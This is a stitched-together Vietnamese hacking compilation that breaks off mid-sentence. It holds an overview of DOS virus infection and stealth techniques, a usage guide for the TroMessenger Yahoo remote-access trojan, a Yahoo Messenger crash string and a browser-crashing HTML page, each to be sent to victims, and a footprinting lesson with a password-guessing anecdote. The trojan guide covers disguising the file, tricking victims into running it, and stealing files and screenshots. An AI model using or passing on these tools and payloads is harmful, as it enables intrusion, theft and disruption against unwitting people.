Ðoạn mã thực hiện nhiệm vụ lây lan là đoạn mã quan trọng trong chương trình virus. Ðể đảm bảo việc lây lan, virus khống chế ngắt quan trọng nhất trong việc đọc/ghi vùng hệ thống: đó là ngắt 13h, tuy nhiên để đảm bảo tốc độ truy xuất đĩa, chỉ các chức năng 2 và 3 (đọc/ghi) là dẫn tới việc lây lan. Việc lây lan bông cách đọc Boot Sector (Master Boot) lên và kiểm tra xem đã bị lây chưa (kỹ thuật kiểm tra đã nói ở trên). Nếu sector khởi động đó chưa bị nhiễm thì virus sẽ tạo một sector khởi động mới với các tham số tương ứng của đoạn mã virus rồi ghi trở lại vào vị trí của nó trên đĩa. Còn sector khởi động vừa đọc lên cùng với thân của virus (loại DB-virus) sẽ được ghi vào vùng xác định trên đĩa. Ngoài ra một số virus còn chiếm ngắt 21 của DOS để lây nhiễm và phá hoại trên các file mà ngắt 21 làm việc.

Việc xây dựng sector khởi động có đoạn mã của virus phải đảm bảo các kỹ thuật sau đây:

- Sector khởi động bị nhiễm phải còn chứa các tham số đĩa phục vụ cho quá trình truy xuất đĩa, đó là bảng tham số BPB của Boot record hay bảng phân chương trong trường hợp Master boot. Việc không bảo toàn sẽ dẫn đến việc virus mất quyền điều khiển hoặc không thể kiểm soát được đĩa nếu virus không có mặt trong môi trường.

- Sự an toàn của sector khởi động nguyên thể và đoạn thân của virus cũng phải được đặt lên hàng đầu. Các kỹ thuật về vị trí cất giấu chúng ta cũng đã phân tích ở các phần trên.

d. Kỹ thuật ngụy trang và gây nhiễu.

Kỹ thuật này ra đời khá muộn về sau này, do khuynh hướng chống lại sự phát hiện của người sử dụng và những lập trình viên đối với virus. Vì kích thước của virus khá nhỏ bé cho nên các lập trình viên hoàn toàn có thể dò từng bước xem cơ chế của virus hoạt động như thế nào, cho nên các virus tìm mọi cách lắt léo để chống lại sự theo dõi của các lập trình viên.

Các virus thường áp dụng một số kỹ thuật sau đây:

- Cố tình viết các lệnh một cách rắc rối như đặt Stack vào các vùng nhớ nguy hiểm, chiếm và xoá các ngắt, thay đổi một cách lắt léo các thanh ghi phân đoạn để người dò không biết dữ liệu lấy từ đâu, thay đổi các giá trị của các lệnh phía sau để người sử dụng khó theo dõi.

- Mã hoá ngay chính chương trình của mình để người sử dụng không phát hiện ra quy luật, cũng như không thấy một cách rõ ràng ngay sự hoạt động của virus.

- Ngụy trang: Cách thứ nhất là đoạn mã cài vào sector khởi động càng ngắn càng tốt và càng giống sector khởi động càng tốt. Tuy vậy cách thứ hai vẫn được nhiều virus áp dụng: Khi máy đang nôm trong quyền chi phối của virus, mọi yêu cầu đọc/ghi Boot sector (Master boot) đều được virus trả về một bản chuẩn: bản trước khi bị virus lây. Ðiều này đánh lừa người sử dụng và các chương trình chống virus không được thiết kế tốt nếu máy hiện đang chịu sự chi phối của virus.

e. Kỹ thuật phá hoại.

Ðã là virus thì bao giờ cũng có tính phá hoại. Có thể phá hoại ở mức đùa cho vui, cũng có thể là phá hoại ở mức độ nghiêm trọng, gây mất mát và đình trệ đối với thông tin trên đĩa.

Căn cứ vào thời điểm phá hoại, có thể chia ra thành hai loại:

- Loại định thời: Loại này lưu giữ một giá trị, giá trị này có thể là ngày giờ, số lần lây nhiễm, số giờ máy đã chạy, ... Nếu giá trị này vượt quá một con số cho phép, nó sẽ tiến hành phá hoại. Loại này thường nguy hiểm vì chúng chỉ phá hoại một lần.

- Loại liên tục: Sau khi bị lây nhiễm và liên tục, virus tiến hành phá hoại, song do tính liên tục này, các hoạt động phá hoại của nó không mang tính nghiêm trọng, chủ yếu là đùa cho vui.

IV. Các đặc điểm của F-VIRUS

So với B-virus thì số lượng F-virus đông đảo hơn nhiều, có lẽ do các tác vụ đĩa với sự hỗ trợ của Int 21 đã trở nên cực kỳ dễ dàng và thoải mái, đó là điều kiện phát triển cho các F-virus.

Thường thì các F-virus chỉ lây lan trên các file khả thi (có đuôi .COM hoặc .EXE), tuy nhiên một nguyên tắc mà virus phải tuân thủ là: Khi thi hành một file khả thi bị lây nhiễm, quyền điều khiển phải nôm trong tay virus trước khi virus trả nó lại cho file bị nhiễm, và khi file nhận lại quyền điều khiển, tất cả mọi dữ liệu của file phải được bảo toàn.

Ðối với F-virus, có một số kỹ thuật được nêu ra ở đây:

1. Kỹ thuật lây lan:

Các F-virus chủ yếu sử dụng hai kỹ thuật: Thêm vào đầu và thêm vào cuối

a. Thêm vào đầu file.
Thông thường, phương pháp này chỉ áp dụng cho các file .COM, tức là đầu vào của chương trình luôn luôn tại PSP:100h. Lợi dụng đầu vào cố định, virus chèn đoạn mã của chương trình virus vào đầu chương trình đối tượng, đẩy toàn bộ chương trình đối tượng xuống phía dưới. Cách này có một nhược điểm là do đầu vào cố định của chương trình .COM là PSP:100, cho nên trước khi trả lại quyền điều khiển cho chương trình, phải đẩy lại toàn bộ chương trình lên bắt đầu từ offset 100h. Cách lây này gây khó khăn cho những người khôi phục vì phải đọc toàn bộ file vào vùng nhớ rồi mới tiến hành ghi lại.

b. Thêm vào cuối file.

Khác với cách lây lan ở trên, trong phương pháp này, đoạn mã của virus sẽ được gắn vào sau của chương trình đối tượng. Phương pháp này được thấy trên hầu hết các loại virus vì phạm vi lây lan của nó rộng rãi hơn phương pháp trên.

Do thân của virus không nôm đúng đầu vào của chương trình, cho nên để chiếm quyền điều khiển, phải thực hiện kỹ thuật sau đây:

- Ðối với file .COM: Thay các byte đầu tiên của chương trình (đầu vào) bông một lệnh nhảy JMP, chuyển điều khiển đến đoạn mã của virus.

E9 xx xx JMP Entry virus.

- Ðối với file .EXE: Chỉ cần định vị lại hệ thống các thanh ghi SS, SP, CS, IP trong Exe Header để trao quyền điều khiển cho phần mã virus.

Ngoài hai kỹ thuật lây lan chủ yếu trên, có một số ít các virus sử dụng một số các kỹ thuật đặc biệt khác như mã hoá phần mã của chương trình virus trước khi ghép chúng vào file để ngụy trang, hoặc thậm chí thay thế một số đoạn mã ngắn trong file đối tượng bông các đoạn mã của virus, gây khó khăn cho quá trình khôi phục.

Khi tiến hành lây lan trên file, đối với các file được đặt các thuộc tính Sys (hệ thống), Read Only (chỉ đọc), Hidden (ẩn), phải tiến hành đổi lại các thuộc tính đó để có thể truy nhập, ngoài ra việc truy nhập cũng thay đổi lại ngày giờ cập nhật của file, vì thế hầu hết các virus đều lưu lại thuộc tính, ngày giờ cập nhật của file để sau khi lây nhiễm sẽ trả lại y nguyên thuộc tính và ngày giờ cập nhật ban đầu của nó.

Ngoài ra, việc cố gắng ghi lên đĩa mềm có dán nhãn bảo vệ cũng tạo ra dòng thông báo lỗi của DOS: Retry - Aboart - Ignoreô, nếu không xử lý tốt thì dễ bị người sử dụng phát hiện ra sự có mặt của virus. Lỗi kiểu này được DOS kiểm soát bông ngắt 24h, cho nên các virus muốn tránh các thông báo kiểu này của DOS khi tiến hành lây lan phải thay ngắt 24h của DOS trước khi tiến hành lây lan rồi sau đó hoàn trả.

2. Kỹ thuật đảm bảo tính tồn tại duy nhất.

Cũng giống như B-virus, một yêu cầu nghiêm ngặt đặt ra đối với F-virus là tính tồn tại duy nhất của mình trong bộ nhớ cũng như trên file.

Trong vùng nhớ, thông thường các F-virus sử dụng hai kỹ thuật chính: Thứ nhất là tạo thêm chức năng cho DOS, bông cách sử dụng một chức năng con nào đó trong đó đặt chức năng lớn hơn chức năng cao nhất mà DOS có. Ðể kiểm tra chỉ cần gọi chức năng này, giá trị trả lại trong thanh ghi quyết định sự tồn tại của virus trong bộ nhớ hay chưa. Cách thứ hai là so sánh một đoạn mã trong vùng nhớ ấn định với đoạn mã của virus, nếu có sự chênh lệch thì có nghĩa là virus chưa có mặt trong vùng nhớ và sẽ tiến hành lây lan.

Trên file, có thể có các cách kiểm tra như kiểm tra bông test logic nào đó với các thông tin của Entry trong thư mục của file này. Cách này không đảm bảo tính chính xác tuyệt đối song nếu thiết kế tốt thì khả năng trùng lặp cũng hạn chế, hầu như không có, ngoài ra một ưu điểm là tốc độ thực hiện kiểm tra rất nhanh. Ngoài ra có thể kiểm tra bông cách dò một đoạn mã đặc trưng (key value) của virus tại vị trí ấn định nào đó trên file, ví dụ trên các byte cuối cùng của file.

3. Kỹ thuật thường trú

Ðây là một kỹ thuật khó khăn, lý do là DOS chỉ cung cấp chức năng thường trú cho chương trình, nghĩa là chỉ cho phép cả chương trình thường trú. Vì vậy nếu sử dụng chức năng của DOS, chương trình virus muốn thường trú thì cả file đối tượng cũng phải thường trú, mà điều này thì không thể được nếu kích thước của file đối tượng quá lớn.

Chính vì lý do trên, hầu hết các chương trình virus muốn thường trú đều phải thao tác qua mặt DOS trên chuỗi MCB bông phương pháp "thủ công". Căn cứ vào việc thường trú được thực hiện trước hay sau khi chương trình đối tượng thi hành, có thể chia kỹ thuật thường trú thành hai nhóm:

a. Thường trú trước khi trả quyền điều khiển.

Như đã nói ở trên, DOS không cung cấp một chức năng nào cho kiểu thường trú này, cho nên chương trình virus phải tự thu xếp. Các cách sau đây đã được virus dùng đến:

- Thao tác trên MCB để tách một khối vùng nhớ ra khỏi quyền điều khiển của DOS, rồi dùng vùng này để chứa chương trình virus.

- Tự định vị vị trí trong bộ nhớ để tải phần thường trú của virus vào, thường thì các virus chọn ở vùng nhớ cao, phía dưới phần tạm trú của file command.com để tránh bị ghi đè khi hệ thống tải lại command.com. Vì không cấp phát bọ nhớ cho phần chương trình virus đang thường trú, cho nên command.com hoàn toàn có quyền cấp phát vùng nhớ đó cho các chương trình khác, nghĩa là chương trình thương trú của virus phải chấp nhận sự mất mát do may rủi.

- Thường trú bông chức năng thường trú 31h: Ðây là một kỹ thuật phức tạp, tiến trình cần thực hiện được mô tả như sau:

Khi chương trình virus được trao quyền, nó sẽ tạo ra một MCB được khai báo là phần tử trung gian trong chuỗi MCB để chứa chương trình virus, sau đó lại tạo tiếp một MCB mới để cho chương trình bị nhiễm bông cách dời chương trình xuống vùng mới này. Ðể thay đổi PSP mà DOS đang lưu giữ thành PSP mà chương trình virus tạo ra cho chương trình đối tượng, phải sử dụng chức năng 50h của ngắt 21h.

b. Thường trú sau khi đoạt lại quyền điều khiển.

Chương trình virus lấy tên chương trình đang thi hành trong môi trường của DOS, rồi nó thi hành ngay chính bản thân mình. Sau khi thi hành xong, quyền điều khiển lại được trả về cho virus, và khi đó nó mới tiến hành thường trú một cách bình thường bông chức năng 31h của ngắt 21h.

4. Kỹ thuật ngụy trang và gây nhiễu

Một nhược điểm không tránh khỏi là file đối tượng bị lây nhiễm virus sẽ bị tăng kích thước. Một số virus ngụy trang bông cách khi sử dụng chức năng DIR của DOS, virus chi phối chức năng tìm kiếm file (chức năng 11h và 12h của ngắt 21h) để giảm kích thước của file bị lây nhiễm xuống, vì thế khi virus đang chi phối máy tính, nếu sử dụng lệnh DIR của DOS, hoặc các lệnh sử dụng chức năng tìm kiếm file ở trên để có thông tin về entry trong bảng thư mục, thì thấy kích thước file bị lây nhiễm vẫn bông kích thước của file ban đầu, điều này đánh lừa người sử dụng về sự trong sạch của file này.

Một số virus còn gây nhiễu bông cách mã hoá phần lớn chương trình virus, chỉ khi nào vào vùng nhớ, chương trình mới được giải mã ngược lại. Một số virus anti-debug bông cách chiếm ngắt 1 và ngắt 3. Bởi vì các chương trình debug thực chất phải dùng ngắt 1 và ngắt 3 để thi hành từng bước một, cho nên khi virus chiếm các ngắt này rồi mà người lập trình dùng debug để theo dõi virus thì kết quả không lường trước được.
Hướng dẫn sử dụng

Đầu tiên các bạn mở file TroMessengerEditServer.exe để tạo file server
-Robot Yahoo!ID: ID yahoo của nick robot mà bạn chọn (phải là nick thật)
-Robot password: pass của nick trên
- mấy ô vuông bên phải thì các bạn cứ check vào thì khi log in nick robot sẽ gửi cho bạn thông tin về máy của victim như là IP, Hệ điều hành, user name, computer name, ID yahoo của victim
-Admin ID: nick của bạn dùng để điều khiển nick robot
-Ô vuông ở dưới thì các bạn cứ check vào thì nick robot sẽ send tin nhắn đến cho bạn khi nào máy victim online
-ô vuông tiếp theo là nhập password để log in: check vào rồi điền password ở phía dưới (pass này để log in lúc điều khiển nick robot)
-Enable Fake Error Message: tạo lỗi giả xong rồi ở ô dưới đánh tên lỗi và nội dung của lỗi sau đó nhấn test để thử (cũng chẳng biết là tạo lỗi giả để làm gì (IMG:style_emoticons/default/10.gif) )
-"Delay for sending long text" và "AutoConect Attempt every" thì cứ để nguyên đấy (ai hiểu ý nghĩa thì chỉ dùm)
-File name after install: tên của trojan sau khi hoạt động (chọn sao cho Window vào để victim khỏi nghi ngờ khi nó hoạt động)
-Server Icon: biểu tượng cho file
-Chọn "Run on remote PC" và chọn build
-Sau khi ấn build thì nó hiện ra cửa sổ cho bạn tìm đường dẫn đến file "TroMessenger.exe" nhấn open rồi nhập tên file server mới và cuối cùng là save lại.

Bây giờ các bạn làm sao để cho victim chạy file này và chờ cho nick robot online (muốn biết lúc nào nó online thì add nick nó vào , mở cửa sổ chat với nick robot gõ "/login pass" pass thì các bạn đánh password protect khi tạo trojan vào, và thế là bạn có thể bắt đầu nghịch phá máy victim được rồi với các lệnh như Andrey đã hướng dẫn (thực ra toàn bộ có trong phần help cả)
http://www.sma-soft.ir/downloads/?u=TroMessenger
[IMG:http://sma-soft.ir/TroMessenger/tro_messenger_11_editserver.JPG]
Translation By: Adon126 @ Yahoo.com

Sơ lược chương trình


Đây là một chương trình xâm nhập và kiểm soát máy tính từ xa thông qua Yahoo! Messenger.
Với công cụ này, bạn có thể kiểm soát bất cứ một máy tính nào bằng cách gửi thông tin qua Yahoo! Messenger ảo thiết lập trong hệ thống.
Từ đó bạn có thể ra lệnh cho máy đối tượng làm theo bất kỳ mệnh lệnh nào.

Cơ chế hoạt động ?
Sau đây là quy trình hoạt động của chương trình sau khi xâm nhập:

0) Chạy vào chương trình khởi động .(Startup).
1) Kiểm soát bộ nhớ hệ thống.
2) Nằm ẩn chờ khi có kết nối vào mạng.
3) Khi máy đối tượng đã kết nối, phát tín hiệu trở về cho máy ID ảo.
4) Gửi thông tin về cho chủ nhân, sau khi quá trình phát tín hiệu thành công.
5) Và bây giờ bạn đã có thể kiểm soát mọi thứ trên máy nạn nhân.


Cấu hình tối thiểu:

1) Hệ điều hành Microsoft Windows XP hoặc Windows Server 2003 . Chương trình không hỗ trợ trên Windows 2000, Windows 98 đến thấp hơn, và hệ thống Linux.
2) 128MB RAM (256MB RAM cấu hình chuẩn)
3) 700Mhz CPU.
4) 8MB Card đồ họa.
5) Dung lượng trống đủ dùng. (Để lưu hình chụp gửi về)
6) Kết nối mạng thường xuyên. Chương trình hoạt động với mọi loại mạng. Ví dụ: Dialup, ADSL, Wireless, Broadband, Satellite, LAN ... v.v
Chương trình vẫn hoạt động với điều kiện truy cập mạng bình thường. Nhưng điều kiện kết nối liên tục thường xuyên sẽ giúp quá trình phát tín hiệu và gửi thông tin tốt hơn.

Tính năng đặc biệt

Không đòi hỏi IP Address ! Đây là ưu thế mạnh nhất của chương trình này. Trong những chương trình trước đây bạn buộc phải có và khai báo một IP Address trong quá trình kiểm soát. Với chương trình này thì không đòi hỏi IP Address.
Nghi vấn - Làm thế nào có thể thực hiện kiểm soát mà không cần IP Address ?
Giải đáp - Bởi vì chương trình này tạo ra hẳn một Yahoo! ID ảo cho bạn, vì vậy bạn không cần phải khai báo IP Address từ máy điều khiển. Mặc dù IP Address vẫn được gửi cho bạn khi kết nối. Nhưng đó chỉ là thông tin cung cấp thêm cho bạn về máy bị kiểm soát, và không có tác dụng gì đối với chương trình TroMessenger.

Chạy ẩn trong hệ thống mạng LAN, kể cả hệ thống Router của máy chủ. Đây là một khuyết điểm của hầu hết các loại Trojan, như là Troya, chỉ hoạt động trên hệ thống có IP tĩnh. Trước đây, bạn phải có được IP Address hợp lệ. Ví dụ: nếu có một hệ thống mạng với 5 máy tính và bạn là một thành viên trong hệ thống mạng đó, bạn có thể truy cập vào các máy khác. Nhưng ai đó nằm ngoài hệ thống mạng này thì không thể truy cập vào bất cứ máy nào trong hệ thống. Bởi vì anh ta không có IP Address hợp lệ để liên kết vào hệ thống. Nhưng giờ đây, vấn đề ĐÃ ĐƯỢC GIẢI QUYẾT với TroMessenger.
Với TroMessenger, bạn có thể truy cập vào bất cứ máy nào ở bất kỳ hệ thống mạng nào. Chỉ cần mọi máy tính được kết nối vào mạng và TroMessenger đang nằm ẩn bên trong.

Các kiểu lệnh

Trong phiên bản này, đây là một số câu lệnh khởi đầu cho việc kiểm soát.

/Result Kết quả của quá trình thực thi sẽ được gửi về ngay sau khi quá trình hoàn tất. Nhưng nếu như nội dung của kết quả gửi về quá dài (nhiều hơn 200 ký tự), nó sẽ được gửi lần lượt, liên tục. Bởi vì Yahoo! Messenger không cho phép nội dung có số ký tự vượt quá giới hạn đã định sẵn.

/cmd - Tương tự MS-DOS Command Prompt. Bạn có thể thực thi lệnh DOS trên máy bị kiểm soát, và nhận được kết quả. Các lệnh như: DIR , VER , VOL , IPConfig , Netstat , WHOAMI v.v ... đều có thể được sử dụng như lệnh DOS.
Ví dụ: /cmd dir C:\*.txt]

Các kiểu lệnh thực thi DOS
Bạn có thể thực thi một số lệnh DOS đặc biệt để khai thác thông tin từ phía máy bị kiểm soát.

/cmd dir - Xem danh sách các tập tin và thư mục. Bạn có thể sử dụng linh động các thông số để khai thác thông tin cụ thể nhất. Ví dụ: /cmd dir /on , /cmd dir *.txt

/cmd ipconfig - Lấy thông tin truy cập. Câu lệnh có chức năng khai thác thông tin từ thiết bị mạng đang sử dụng trên máy bị kiểm soát. Nó sẽ truy ra tên thiết bị mạng, địa chỉ IP, cổng vào, DNS Server ... v.v

/cmd tasklist - Lấy danh sách các chương trình đang hoạt động. Tương tự như Windows Task Manager. Nhưng dưới giao diện DOS.

/cmd whoami - Cung cấp thông tin để xác định máy qua mạng. Thông tin gửi về gồm : TÊN MIỀN / TÊN NHÓM MẠNG , Tên máy tính và tên truy cập máy tính sử dụng WINDOWS. Lưu ý : Câu lệnh này chỉ hoạt động với Windows Server 2003. Không hỗ trợ trên Windows XP.

/cmd netstat - Hiển thị hệ thống mạng và tất cả kết nối hiện có trên máy tính. Để đạt tốc độ nhanh, sử dụng /cmd netstat -na

Khai thác thông tin của máy tính:
Chỉ việc sử dụng câu lệnh này, bạn có thể lấy được thông tin chính từ máy đối tượng.

/IP - cho biết địa chỉ IP. Một máy tính có thể có nhiều hơn một địa chỉ IP khi hoạt động. Ví dụ : bạn có một tài khoản để kết nối internet, và máy tính của bạn đang nằm trong một khu vực kết nối mạng nội bộ (LAN). Vì vậy bạn sẽ có 2 địa chỉ IP ấn định trong máy tính. TroMessenger sẽ gửi toàn bộ địa chỉ IP hiện hành trên máy tính.

/osname - cho bạn biết đầy đủ về tên của Hệ điều hành Windows và tên các phiên bản cập nhật. Ví dụ : Windows Server 2003 Service Pack 1.

/computername: cho biết tên thiết lập của máy trên hệ thống mạng. Các máy tính nhận dạng nhau qua tên này. Nếu máy tính hiện thời chưa được kết nối, không thành vấn đề, nội dung sẽ được gửi ngay sau đó.

/winusername: cho biết tài khoản quản lý sử dụng Windows. Đặc biệt trong Windows XP, có thể sẽ có nhiều tài khoản sử dụng cùng một máy. Và thông tin này sẽ được thay đổi mỗi khi người sử dụng truy cập.
Nhưng với Windows Server 2003 tên này luôn được trả về Administrator. Tuy nhiên dân Admin đã biết chuyển tên tài khoản. nhưng thông thường đa số Admin lại quên làm.

/yahooid - Cho biết tên Yahoo ID của người cuối cùng đang bị kiểm soát.

Những chức năng chính

/Help - Hiển thị các lệnh hợp lệ của TroMessenger. Sẽ có nhiều câu lệnh hơn trong những phiên bản mới. Lúc đó bạn chỉ cần sử dụng lệnh này.

/screenshot - Cho bạn ảnh chụp màn hình của máy tính đối tượng.
Nghi vấn - Yahoo! Messenger là chương trình viết bằng ngữ lệnh, làm sao TroMessenger có thể cho tôi xem ảnh chụp ?
Giải đáp - TroMessenger cho bạn ảnh ngay tức khắc. Có nghĩa là : chụp sao lại màn hình, sau đó tải lên mạng, và gửi đến bạn một liên kết để xem ảnh.

/download - Tải về một thứ gì đó và lưu lại trên máy đối tượng. Bạn sẽ được thông báo khi quá trình hoàn tất.
Câu lệnh: /download "http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Chú ý: Bạn phải sử dụng dấu ngoặc ("). Nếu quên, quá trình tải về sẽ không thực hiện được.

/restart - Khởi động lại máy tính.
Chú ý: Nếu bạn chạy thử nghiệm trên máy tính của bạn, bạn sẽ bị khởi động ngay lập tức mà không có tín hiệu thông báo nào. Và những chương trình trên máy sẽ bị mất. Hãy cẩn thận khi sử dụng câu lệnh này. Tương tự như Shutdown command.

/shutdown - Tắt máy tính. (Lặp lại chú ý)

/time , /date - Hiển thị ngày và giờ.

/ejectcd - Mở ổ đĩa CD-ROM.

/closecd - Đóng ổ đĩa CD-ROM sau khi mở.

/view - Hiển thị nội dung của văn bản. Lưu ý: nếu văn bản nhiều hơn ... ký tự, nó sẽ được ngắt ra thành nhiều phần để gửi liên tiếp nhau.

/getfile - tải bất kỳ tập tin nào lên mạng và gửi liên kết tải về cho bạn. Được sử dụng khi bạn muốn đọc những tập tin không phải là tập tin văn bản từ máy đối tượng

/status , /idle , /busy - Đặt tín hiệu hiển thị cho địa chỉ ảo. Như là tín hiệu Busy hoặc Idle Icons bên cạnh ID.
Câu lệnh ví dụ :
/status Toiyeuem.
/idle Dangantoi.
/busy Hiendangban.

/cancel - Đình chỉ câu lệnh đang thực hiện. Ví dụ khi bạn muốn xem một tập tin văn bản có dung lượng 1MB. Và nội dung đang được gửi đi từng phần, nhưng rồi bạn cảm thấy chán và không muốn xem nữa và muốn gửi một lệnh khác. Chỉ cần dùng lệnh /cancel là xong.

/login - Đăng nhập tài khoản sử dụng quản lý. Mỗi khi TroMessenger khởi động, nếu bạn không được xác nhận là chủ quản lý của chương trình, nhưng bạn biết mật khẩu, bạn sẽ sử dụng /login your password để bắt đầu điều khiển chương trình. Không sử dụng dấu ngoặc cho mật khẩu....
1. Khởi động Yahoo và đăng nhập

2. PM cho 1 người trong list đoạn code sau:
"s: msg :---------------------------------------------iframe onload=$InlineAction()>smilie" (không có " " nha)

4. Send đi là oK

Lưu ý: "msg :" phải cách khoảng bằng cách nhấn Alt+0160

Link:
http://www.securityfocus.com/archive/82/437751/30/0/threaded
Chỉ cần tạo 1 tập tin *.html rồi up lên mạng => đưa link cho victim là ok

Code:
<html>
<head>
<style>
</style>
<title>You will die</title></head>
<body onload="javascript:window.location.reload(false)">
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>
<marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma
rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq
uee></marquee></marquee></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</marquee></marquee></marquee></marquee></marquee></marquee></marquee></
marquee></marquee></marquee></marquee></marquee></marquee></marquee>
</body>
</html>
Bài học này được chia làm 2 phần chính, với mục đích là giới thiệu cho các bạn hiểu một số cách thức mà hacker sử dụng để thâm nhập vào hệ thống và một số phương pháp có thể áp dụng để tự bảo vệ bạn. Bài học này cũng không có ý định hướng bạn đến một cái nhìn xấu về hành vi của hacker mà mục đích là giúp bạn hiểu rõ hơn về vấn đề an toàn bảo mật.

Cụ thể như sau:
1- Các hacker đã làm như thế nào, động cơ thúc đẩy họ và các phương pháp thông dụng
2- Một số biện pháp tự bảo vệ, bắt đầu từ việc thiết kế, xây dựng ngôi nhà của bạn đến việc đánh giá, tìm hiểu rõ hơn về các quá trình nhận dạng xâm nhập, tự bảo vệ...

Chúng ta sẽ đi từng bước một. Ở đây tôi sẽ cố gắng tóm lược mà ko đi quá sâu vào chi tiết nhằm tạo bài học sáng sủa dễ hiểu, nếu có ý kiến thắc mắc, các bạn hãy post lên sau mọi người sẽ cùng trao đổi giải quyết.

I. PHÍA HACKERS
1- Mục đích và động cơ của hackers:
- Đạt mục đích gì đó liên quan đến tiền bạc, như thay đổi thông tin về tài khoản trong ngân hàng, chuyển tiền, trộm credit card...
- Giải trí khi rảnh rỗi, thử tay nghề, chứng tỏ khả năng , kiểm tra mức độ bảo mật...
- Làm yếu đi hoặc giảm khả năng chống cự của các hệ thống trên mạng, giúp dễ dàng cho việc xâm nhập khai thác theo mục đích nào khác...
- Tận dụng các tài nguyên trên mạng như đĩa cứng, tốc độ CPU, dung lượng đường truyền mạng...Hacker có thể lợi dụng sơ hở của 1 server để chiếm một vùng ko gian đĩa free trên nó để chứa dữ liệu của mình, hoặc lợi dụng tốc độ CPU và bandwidth của các server (thường rất nhanh) để làm vào việc khác như tính toán..., thậm chí dùng để Dos các server khác...
Từ những mục đích trên, bạn cần hiểu rõ bản thân hệ thống bạn đang kiểm soát. Có những vấn đề đặt ra như sau:
- Bạn đang nắm giữ và bảo vệ cái gì, mức độ quan trọng của chúng?
- Cách thức nào người ta có thể tìm cách tấn công, trộm thông tin hay thậm chí phá hủy thông tin của bạn?
- Mức độ khó mà hacker sẽ gặp phải, họ thành công đến mức độ nào?
- Mức độ ảnh hưởng nghiêm trọng thế nào nếu hacker thành công?
Việc hiểu rõ và đánh giá đúng chính mình cũng như khả năng của đối phương có thể giúp bạn hạn chế tối đa khả năng bị tấn công. Có một điều bạn phải hiểu nó như một yếu tố khách quan, tất yếu là "Mọi hệ thống phức tạp sớm muộn cũng sẽ gặp rắc rối", vì đơn giản là các hệ thống đó cho bàn tay và trí tuệ con người tạo ra, mà con người thì không ai hoàn hảo cả. Nếu bạn chú ý sẽ biết trong thời gian vừa qua, các hệ thống được xem vào hàng đại gia trên net đều đã từng được viếng thăm, như Microsoft, Oracle, eBay, NASA, CIA, các cơ quan liên bang USA, các hệ thống ngân hàng lớn trên thế giới...Security liên tục được cải thiện, và bên cạnh đó thì lỗi, lổ hổng cũng ko ngừng được phát hiện.

2- Một số cách thức hacker dùng để xâm nhập
Về cơ bản, để có thể tiến hành thâm nhập vào hệ thống, các hacker thường phải qua những bước sau. Lưu ý các bước tôi trình bày ở đây không bắt buộc phải được thực hiện tuần tự mà tùy vào điều kiện và ngữ cảnh để áp dụng cho thích hợp. Các công cụ trình bày ở đây các bạn cần tìm hiểu cách sử dụng, tôi sẽ không trình bày chi tiết.

a. Xác định mục tiêu - Footprinting
Bước này tương đối đơn giản. Tuy nhiên đối với hacker thật sự muốn tìm cách thâm nhập vào 1 hệ thống thì bước này rất cần thiết. Càng thu thập được nhiều thông tin liên quan đến mục tiêu càng tốt. Ví dụ như muốn thâm nhập trang web của 1 công ty nào đó, điều đầu tiên các hacker thường dùng là xác định host, domain (nếu là website); dùng các công cụ như WhoIS, Ping, ICMP (nMap, Fping)..để tìm hiểu các thông tin liên quan đến host/domain như vị trí, các Domain Name Records..Ví dụ từ domain name, ta có thể ping để biết được nó host ở đâu với IP cụ thể là gì...; hoặc tìm hiểu cấu trúc mạng của đối phương sử dụng các phương pháp routing (traceroute) và SNMP data.
Kế đến là dạo quanh web site, tìm hiểu cấu trúc website, tìm cách download source code (bằng các trình như Teleport Pro, Intellitamper..), vì từ đó có thể biết được các thông tin mà người chủ cố tình hoặc vô tình để hở như tên liên lạc, emails, số điện thoại, các thông tin liên quan đến bảo mật (như cơ chế an toàn, ngôn ngữ lập trình..); các liên kết liên quan đến website...
Việc dạo và xem cấu trúc website đôi khi sẽ cho ta cái nhìn tổng quan về bảo mật của site đó, nếu may mắn ta có thể tìm được lỗi (thường là lỗi lập trình, lỗi thiết lập access right/chmod chưa đúng..) trên các webpage, liên kết.
Các search engine như Google, AltaVista...cũng có thể trở thành công cụ rất hữu ích trong quá trình này. Ví dụ search trên Google để tìm các trang dùng asp, có trang quản lý của admin và giới hạn ở các site ViệtNam, ta có thể search theo từ khóa: "/admin/ asp site:.com.vn" hoặc "admin.asp login.asp site:.com.vn" ..Ví dụ search trên AltaVista để tìm các link liên quan đến site www.hcm.fpt.vn, ta có thể dùng từ khóa "link:www.hcm.fpt.vn AND anydata"
Đây là một ví dụ điển hình về kết quả đạt được khi tìm hiểu về website:
Lần dạo đầu tiên qua site này điều đầu tiên nhận thấy là họ dùng ASP để thiết kế. Tuy nhiên tôi chưa vội quan tâm đến việc tìm lỗi liên quan đến nó mà chú ý đến mục Hội viên và Đăng nhập hội viên, đây là vùng riêng của các member tham gia webiste. Cụ thể là tại , điều tôi hay làm là thử download cấu trúc website dùng Intellitamper. Kết quả sau khi download của IT là rất nhiều file asp, ở đây tôi quan tâm đến thư mục /hoivien/ vì trang đăng nhập nằm ở thư mục này. Trong thư mục này kết quả cho thấy có 6 file asp, trong đó có file hvshow.asp làm tôi quan tâm. Tôi chạy thử nó trên browser , kết quả cho thấy bên cạnh thông báo đăng kí là thông tin của hội viên thứ 1 với login name là Cóco, tên là DuongMinh và 1 số thông tin khác. Nghĩ đến việc đoán password, tôi quay trở lại trang login lúc nãy và thử đăng nhập vào với login name là Cóco, pass là duongminh. Không thành công! pass là duong Cũng fail! pass là minh! Thành công! Bạn là Hội viên Vàng...Sau đó tôi xem qua 1 chút và cẩn thận 